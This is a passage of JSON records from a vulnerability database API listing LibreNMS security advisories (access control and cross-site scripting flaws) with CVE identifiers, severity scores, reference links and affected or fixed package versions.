lic2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@22.2.2"},{"url":"http://public2.vulnerablecode.io/api/packages/539238?format=json","purl":"pkg:composer/librenms/librenms@201609","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@201609"}],"aliases":["CVE-2022-0772","GHSA-vhm6-gw82-6f8j"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-kn2w-mmss-s7hu"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/42399?format=json","vulnerability_id":"VCID-m1hm-kqrc-3kbj","summary":"Improper Access Control\nImproper access control was found in librenms.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-0580","reference_id":"","reference_type":"","scores":[{"value":"2e-05","scoring_system":"epss","scoring_elements":"0.00033","published_at":"2026-06-08T12:55:00Z"},{"value":"2e-05","scoring_system":"epss","scoring_elements":"0.00032","published_at":"2026-06-09T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-0580"},{"reference_url":"https://github.com/librenms/librenms","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms"},{"reference_url":"https://github.com/librenms/librenms/commit/95970af78e4c899744a715766d744deef8c505f7","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms/commit/95970af78e4c899744a715766d744deef8c505f7"},{"reference_url":"https://huntr.dev/bounties/2494106c-7703-4558-bb1f-1eae59d264e3","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://huntr.dev/bounties/2494106c-7703-4558-bb1f-1eae59d264e3"},{"reference_url":"https://notes.netbytesec.com/2022/02/multiple-vulnerabilities-in-librenms.html","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://notes.netbytesec.com/2022/02/multiple-vulnerabilities-in-librenms.html"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-0580","reference_id":"CVE-2022-0580","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-0580"},{"reference_url":"https://github.com/advisories/GHSA-33wf-4crm-2322","reference_id":"GHSA-33wf-4crm-2322","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-33wf-4crm-2322"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/60660?format=json","purl":"pkg:composer/librenms/librenms@22.2.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-13ug-m6cb-hbcc"},{"vulnerability":"VCID-2ccw-938t-yyaj"},{"vulnerability":"VCID-2t5k-atx8-eycd"},{"vulnerability":"VCID-2w1a-3ym6-hygb"},{"vulnerability":"VCID-2z9m-fwyr-17b3"},{"vulnerability":"VCID-3b6p-2q4u-kkb5"},{"vulnerability":"VCID-5f5f-pkcz-bfhr"},{"vulnerability":"VCID-5hwq-6gme-c3gh"},{"vulnerability":"VCID-5vg7-7y5w-muhw"},{"vulnerability":"VCID-6cy6-6ss3-tqaz"},{"vulnerability":"VCID-7f5s-p5u4-abhh"},{"vulnerability":"VCID-7fbt-znx9-ukaj"},{"vulnerability":"VCID-7m7b-578h-bqhj"},{"vulnerability":"VCID-7s6j-vmn5-p7eh"},{"vulnerability":"VCID-7srz-umtt-n7e1"},{"vulnerability":"VCID-8ks5-6azh-67ed"},{"vulnerability":"VCID-8nsn-f1fc-6ucm"},{"vulnerability":"VCID-98mh-t1va-xqa8"},{"vulnerability":"VCID-99dx-dees-2fg3"},{"vulnerability":"VCID-af73-74xn-9fap"},{"vulnerability":"VCID-appm-zs6z-v3b2"},{"vulnerability":"VCID-b67g-878z-sygx"},{"vulnerability":"VCID-bfnn-xz3r-sfcv"},{"vulnerability":"VCID-ca8g-usbx-5ydu"},{"vulnerability":"VCID-cvn6-ggwj-9fcm"},{"vulnerability":"VCID-dff6-r5mp-p3d5"},{"vulnerability":"VCID-f9v9-rmse-cbcg"},{"vulnerability":"VCID-fc9k-4dhn-m7du"},{"vulnerability":"VCID-gj21-fy13-33h2"},{"vulnerability":"VCID-h5y9-mrn4-q7br"},{"vulnerability":"VCID-hacq-7c9c-qkaz"},{"vulnerability":"VCID-hj1w-rpxt-4ygp"},{"vulnerability":"VCID-jjwh-716d-73hc"},{"vulnerability":"VCID-jwh7-vtxs-aqhr"},{"vulnerability":"VCID-kkqd-nzsw-23cr"},{"vulnerability":"VCID-kn2w-mmss-s7hu"},{"vulnerability":"VCID-mchv-4jpx-audc"},{"vulnerability":"VCID-me5y-39aj-fkhe"},{"vulnerability":"VCID-mhf4-mtt1-t3fn"},{"vulnerability":"VCID-n5u3-c21p-ukas"},{"vulnerability":"VCID-ncgs-c7tb-gbfg"},{"vulnerability":"VCID-nyn8-7mkk-zbb3"},{"vulnerability":"VCID-pksv-nv1a-sqev"},{"vulnerability":"VCID-qhpe-7ws8-kqb7"},{"vulnerability":"VCID-qqnn-43db-guek"},{"vulnerability":"VCID-sa1y-ej2a-fba9"},{"vulnerability":"VCID-t5mk-a8n2-rkcg"},{"vulnerability":"VCID-u1km-tzd2-5bhq"},{"vulnerability":"VCID-us6w-wwkm-dqc5"},{"vulnerability":"VCID-uuwy-rk5r-tkc7"},{"vulnerability":"VCID-ux81-kyy9-bkaz"},{"vulnerability":"VCID-uzy1-yh5d-dqbt"},{"vulnerability":"VCID-v2sw-u952-7qfz"},{"vulnerability":"VCID-v3wv-6q6b-fqa3"},{"vulnerability":"VCID-vepx-waum-1bfc"},{"vulnerability":"VCID-w5dm-5pyj-cfef"},{"vulnerability":"VCID-w9mu-bbkx-sbeq"},{"vulnerability":"VCID-whxh-v47a-8yhh"},{"vulnerability":"VCID-x1aq-5a19-yye7"},{"vulnerability":"VCID-y3qu-d719-jff6"},{"vulnerability":"VCID-y5mq-m57f-b3bx"},{"vulnerability":"VCID-y6jm-2987-9uh2"},{"vulnerability":"VCID-yhmt-yukb-kuge"},{"vulnerability":"VCID-ywp5-cwm9-afb5"},{"vulnerability":"VCID-z744-37t6-pud6"},{"vulnerability":"VCID-zech-eg55-gbcn"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@22.2.0"},{"url":"http://public2.vulnerablecode.io/api/packages/539238?format=json","purl":"pkg:composer/librenms/librenms@201609","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@201609"}],"aliases":["CVE-2022-0580","GHSA-33wf-4crm-2322"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-m1hm-kqrc-3kbj"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50190?format=json","vulnerability_id":"VCID-mchv-4jpx-audc","summary":"LibreNMS affected by reflected xss via email field\nreflected xss via email field","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-26987","reference_id":"","reference_type":"","scores":[{"value":"1e-05","scoring_system":"epss","scoring_elements":"6e-05","published_at":"2026-06-09T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-26987"},{"reference_url":"https://github.com/librenms/librenms","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms"},{"reference_url":"https://github.com/librenms/librenms/commit/8e626b38ef92e240532cdac2ac7e38706a71208b","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-20T15:31:42Z/"}],"url":"https://github.com/librenms/librenms/commit/8e626b38ef92e240532cdac2ac7e38706a71208b"},{"reference_url":"https://github.com/librenms/librenms/pull/19038","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-20T15:31:42Z/"}],"url":"https://github.com/librenms/librenms/pull/19038"},{"reference_url":"https://github.com/librenms/librenms/releases/tag/26.2.0","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-20T15:31:42Z/"}],"url":"https://github.com/librenms/librenms/releases/tag/26.2.0"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-26987","reference_id":"CVE-2026-26987","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-26987"},{"reference_url":"https://github.com/advisories/GHSA-gqx7-99jw-6fpr","reference_id":"GHSA-gqx7-99jw-6fpr","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-gqx7-99jw-6fpr"},{"reference_url":"https://github.com/librenms/librenms/security/advisories/GHSA-gqx7-99jw-6fpr","reference_id":"GHSA-gqx7-99jw-6fpr","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-20T15:31:42Z/"}],"url":"https://github.com/librenms/librenms/security/advisories/GHSA-gqx7-99jw-6fpr"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74102?format=json","purl":"pkg:composer/librenms/librenms@26.2.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-7f5s-p5u4-abhh"},{"vulnerability":"VCID-7s6j-vmn5-p7eh"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@26.2.0"}],"aliases":["CVE-2026-26987","GHSA-gqx7-99jw-6fpr"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-mchv-4jpx-audc"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/47529?format=json","vulnerability_id":"VCID-me5y-39aj-fkhe","summary":"LibreNMS uses Improper Sanitization on Service template name leads to Stored XSS\nThere is improper sanitization on Service template name which is reflecting in delete button onclick event. This value can be modified and crafted as any other javascript code.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-32479","reference_id":"","reference_type":"","scores":[{"value":"0.00522","scoring_system":"epss","scoring_elements":"0.67256","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00522","scoring_system":"epss","scoring_elements":"0.67255","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00522","scoring_system":"epss","scoring_elements":"0.6724","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00522","scoring_system":"epss","scoring_elements":"0.67272","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00522","scoring_system":"epss","scoring_elements":"0.67264","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-32479"},{"reference_url":"https://github.com/librenms/librenms","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms"},{"reference_url":"https://github.com/librenms/librenms/blob/a61c11db7e8ef6a437ab55741658be2be7d14d34/app/Http/Controllers/ServiceTemplateController.php#L67C23-L67C23","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-04-23T00:22:50Z/"}],"url":"https://github.com/librenms/librenms/blob/a61c11db7e8ef6a437ab55741658be2be7d14d34/app/Http/Controllers/ServiceTemplateController.php#L67C23-L67C23"},{"reference_url":"https://github.com/librenms/librenms/commit/19344f0584d4d6d4526fdf331adc60530e3f685b","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-04-23T00:22:50Z/"}],"url":"https://github.com/librenms/librenms/commit/19344f0584d4d6d4526fdf331adc60530e3f685b"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-32479","reference_id":"CVE-2024-32479","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-32479"},{"reference_url":"https://github.com/advisories/GHSA-72m9-7c8x-pmmw","reference_id":"GHSA-72m9-7c8x-pmmw","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-72m9-7c8x-pmmw"},{"reference_url":"https://github.com/librenms/librenms/security/advisories/GHSA-72m9-7c8x-pmmw","reference_id":"GHSA-72m9-7c8x-pmmw","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-04-23T00:22:50Z/"}],"url":"https://github.com/librenms/librenms/security/advisories/GHSA-72m9-7c8x-pmmw"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/69846?format=json","purl":"pkg:composer/librenms/librenms@24.4.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2t5k-atx8-eycd"},{"vulnerability":"VCID-2w1a-3ym6-hygb"},{"vulnerability":"VCID-2z9m-fwyr-17b3"},{"vulnerability":"VCID-3prv-5fpd-c3hd"},{"vulnerability":"VCID-5f5f-pkcz-bfhr"},{"vulnerability":"VCID-5hwq-6gme-c3gh"},{"vulnerability":"VCID-5vg7-7y5w-muhw"},{"vulnerability":"VCID-7f5s-p5u4-abhh"},{"vulnerability":"VCID-7m7b-578h-bqhj"},{"vulnerability":"VCID-7s6j-vmn5-p7eh"},{"vulnerability":"VCID-8ks5-6azh-67ed"},{"vulnerability":"VCID-8nsn-f1fc-6ucm"},{"vulnerability":"VCID-98mh-t1va-xqa8"},{"vulnerability":"VCID-99dx-dees-2fg3"},{"vulnerability":"VCID-appm-zs6z-v3b2"},{"vulnerability":"VCID-bfnn-xz3r-sfcv"},{"vulnerability":"VCID-ca8g-usbx-5ydu"},{"vulnerability":"VCID-dff6-r5mp-p3d5"},{"vulnerability":"VCID-f9v9-rmse-cbcg"},{"vulnerability":"VCID-fc9k-4dhn-m7du"},{"vulnerability":"VCID-gj21-fy13-33h2"},{"vulnerability":"VCID-h5y9-mrn4-q7br"},{"vulnerability":"VCID-hacq-7c9c-qkaz"},{"vulnerability":"VCID-hj1w-rpxt-4ygp"},{"vulnerability":"VCID-jjwh-716d-73hc"},{"vulnerability":"VCID-jwh7-vtxs-aqhr"},{"vulnerability":"VCID-kkqd-nzsw-23cr"},{"vulnerability":"VCID-mchv-4jpx-audc"},{"vulnerability":"VCID-ncgs-c7tb-gbfg"},{"vulnerability":"VCID-pksv-nv1a-sqev"},{"vulnerability":"VCID-qhpe-7ws8-kqb7"},{"vulnerability":"VCID-t5mk-a8n2-rkcg"},{"vulnerability":"VCID-uuwy-rk5r-tkc7"},{"vulnerability":"VCID-ux81-kyy9-bkaz"},{"vulnerability":"VCID-uzy1-yh5d-dqbt"},{"vulnerability":"VCID-v2sw-u952-7qfz"},{"vulnerability":"VCID-v3wv-6q6b-fqa3"},{"vulnerability":"VCID-vepx-waum-1bfc"},{"vulnerability":"VCID-y5mq-m57f-b3bx"},{"vulnerability":"VCID-yhmt-yukb-kuge"},{"vulnerability":"VCID-z744-37t6-pud6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@24.4.0"}],"aliases":["CVE-2024-32479","GHSA-72m9-7c8x-pmmw"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-me5y-39aj-fkhe"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/46042?format=json","vulnerability_id":"VCID-mhf4-mtt1-t3fn","summary":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')\nCross-site Scripting (XSS) - DOM in GitHub repository librenms/librenms prior to 23.9.1.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-5060","reference_id":"","reference_type":"","scores":[{"value":"4e-05","scoring_system":"epss","scoring_elements":"0.00178","published_at":"2026-06-09T12:55:00Z"},{"value":"4e-05","scoring_system":"epss","scoring_elements":"0.0018","published_at":"2026-06-06T12:55:00Z"},{"value":"4e-05","scoring_system":"epss","scoring_elements":"0.00179","published_at":"2026-06-08T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-5060"},{"reference_url":"https://github.com/librenms/librenms","reference_id":"","reference_type":"","scores":[{"value":"8.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms"},{"reference_url":"https://github.com/librenms/librenms/commit/8fd8d9b06a11060de5dc69588a1a83594a7e6f72","reference_id":"","reference_type":"","scores":[{"value":"8.4","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H"},{"value":"8.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-09-25T14:21:40Z/"}],"url":"https://github.com/librenms/librenms/commit/8fd8d9b06a11060de5dc69588a1a83594a7e6f72"},{"reference_url":"https://huntr.dev/bounties/01b0917d-f92f-4903-9eca-bcfc46e847e3","reference_id":"","reference_type":"","scores":[{"value":"8.4","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H"},{"value":"8.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-09-25T14:21:40Z/"}],"url":"https://huntr.dev/bounties/01b0917d-f92f-4903-9eca-bcfc46e847e3"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-5060","reference_id":"CVE-2023-5060","reference_type":"","scores":[{"value":"8.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-5060"},{"reference_url":"https://github.com/advisories/GHSA-2q8c-gqf4-mg3v","reference_id":"GHSA-2q8c-gqf4-mg3v","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-2q8c-gqf4-mg3v"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/66999?format=json","purl":"pkg:composer/librenms/librenms@23.9.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2t5k-atx8-eycd"},{"vulnerability":"VCID-2w1a-3ym6-hygb"},{"vulnerability":"VCID-2z9m-fwyr-17b3"},{"vulnerability":"VCID-3prv-5fpd-c3hd"},{"vulnerability":"VCID-5f5f-pkcz-bfhr"},{"vulnerability":"VCID-5hwq-6gme-c3gh"},{"vulnerability":"VCID-5vg7-7y5w-muhw"},{"vulnerability":"VCID-6cy6-6ss3-tqaz"},{"vulnerability":"VCID-7f5s-p5u4-abhh"},{"vulnerability":"VCID-7m7b-578h-bqhj"},{"vulnerability":"VCID-7s6j-vmn5-p7eh"},{"vulnerability":"VCID-8ks5-6azh-67ed"},{"vulnerability":"VCID-8nsn-f1fc-6ucm"},{"vulnerability":"VCID-98mh-t1va-xqa8"},{"vulnerability":"VCID-99dx-dees-2fg3"},{"vulnerability":"VCID-af73-74xn-9fap"},{"vulnerability":"VCID-appm-zs6z-v3b2"},{"vulnerability":"VCID-bfnn-xz3r-sfcv"},{"vulnerability":"VCID-ca8g-usbx-5ydu"},{"vulnerability":"VCID-cvn6-ggwj-9fcm"},{"vulnerability":"VCID-dff6-r5mp-p3d5"},{"vulnerability":"VCID-f9v9-rmse-cbcg"},{"vulnerability":"VCID-fc9k-4dhn-m7du"},{"vulnerability":"VCID-gj21-fy13-33h2"},{"vulnerability":"VCID-h5y9-mrn4-q7br"},{"vulnerability":"VCID-hacq-7c9c-qkaz"},{"vulnerability":"VCID-hj1w-rpxt-4ygp"},{"vulnerability":"VCID-jjwh-716d-73hc"},{"vulnerability":"VCID-jwh7-vtxs-aqhr"},{"vulnerability":"VCID-kkqd-nzsw-23cr"},{"vulnerability":"VCID-mchv-4jpx-audc"},{"vulnerability":"VCID-me5y-39aj-fkhe"},{"vulnerability":"VCID-ncgs-c7tb-gbfg"},{"vulnerability":"VCID-pksv-nv1a-sqev"},{"vulnerability":"VCID-qhpe-7ws8-kqb7"},{"vulnerability":"VCID-t5mk-a8n2-rkcg"},{"vulnerability":"VCID-uuwy-rk5r-tkc7"},{"vulnerability":"VCID-ux81-kyy9-bkaz"},{"vulnerability":"VCID-uzy1-yh5d-dqbt"},{"vulnerability":"VCID-v2sw-u952-7qfz"},{"vulnerability":"VCID-v3wv-6q6b-fqa3"},{"vulnerability":"VCID-vepx-waum-1bfc"},{"vulnerability":"VCID-whxh-v47a-8yhh"},{"vulnerability":"VCID-y3qu-d719-jff6"},{"vulnerability":"VCID-y5mq-m57f-b3bx"},{"vulnerability":"VCID-yhmt-yukb-kuge"},{"vulnerability":"VCID-ywp5-cwm9-afb5"},{"vulnerability":"VCID-z744-37t6-pud6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@23.9.1"},{"url":"http://public2.vulnerablecode.io/api/packages/539238?format=json","purl":"pkg:composer/librenms/librenms@201609","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@201609"}],"aliases":["CVE-2023-5060","GHSA-2q8c-gqf4-mg3v"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-mhf4-mtt1-t3fn"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/46034?format=json","vulnerability_id":"VCID-n5u3-c21p-ukas","summary":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in librenms/librenms.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-4980","reference_id":"","reference_type":"","scores":[{"value":"0.00038","scoring_system":"epss","scoring_elements":"0.11739","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00038","scoring_system":"epss","scoring_elements":"0.1182","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00038","scoring_system":"epss","scoring_elements":"0.11856","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00038","scoring_system":"epss","scoring_elements":"0.1175","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00038","scoring_system":"epss","scoring_elements":"0.11862","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-4980"},{"reference_url":"https://github.com/librenms/librenms","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms"},{"reference_url":"https://github.com/librenms/librenms/commit/cfd642be6a1e988453bd63069d17db3664e7de97","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-09-20T17:28:54Z/"}],"url":"https://github.com/librenms/librenms/commit/cfd642be6a1e988453bd63069d17db3664e7de97"},{"reference_url":"https://huntr.dev/bounties/470b9b13-b7fe-4b3f-a186-fdc5dc193976","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-09-20T17:28:54Z/"}],"url":"https://huntr.dev/bounties/470b9b13-b7fe-4b3f-a186-fdc5dc193976"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-4980","reference_id":"CVE-2023-4980","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-4980"},{"reference_url":"https://github.com/advisories/GHSA-qxrq-376q-p39h","reference_id":"GHSA-qxrq-376q-p39h","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-qxrq-376q-p39h"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.i